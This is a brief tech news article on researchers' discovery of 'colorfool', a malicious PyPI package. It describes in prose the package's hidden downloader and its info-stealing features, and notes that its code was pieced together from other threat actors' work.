Security researchers have discovered another malicious PyPI package (opens in a new tab), whose purpose is to steal people's sensitive data and allow unauthenticated users to access the compromised device.
The package, named "colorfool," was obviously malicious, they said. It contained a Python file of "suspicious size" whose sole task was to download another file from the Internet and execute it, while ensuring that it remained hidden from the device user.
"The function therefore immediately appeared suspicious and likely malicious," the report said.
Code "Borrow"
To make matters worse, that wasn't even the only suspect in this case. The URL from which the package should download the payload was hardcoded, which is another red flag.
The Python script, code.py, had information-stealing features such as keylogging and cookie exfiltration. Furthermore, it was capable of stealing passwords, killing apps, taking screenshots, stealing data from crypto wallets, and even using the device's webcam.
What sets this package apart from all the other malicious PyPI packages security researchers discover on an almost daily basis is its Frankenstein-like nature. The code was assembled from pieces of other people's work, sometimes without regard to logic, code flow or anything else, the researchers suggest. As if the author was simply copying and pasting parts of the code, often leaving excess code there.
"The combination of obfuscation and egregious malicious code indicates that it is unlikely that all of the code was developed by a single entity," the researchers said. "The final developer may have mostly used other people's code, adding it by copy-pasting."
In fact, the code even includes the "Snake" game, which doesn't seem to serve any particular purpose.
For researchers, this is a perfect example of the "democratization of cybercrime," where threat actors can simply take other threat actors' code and incorporate it into their work.
Via: The Registry (Opens in a new tab)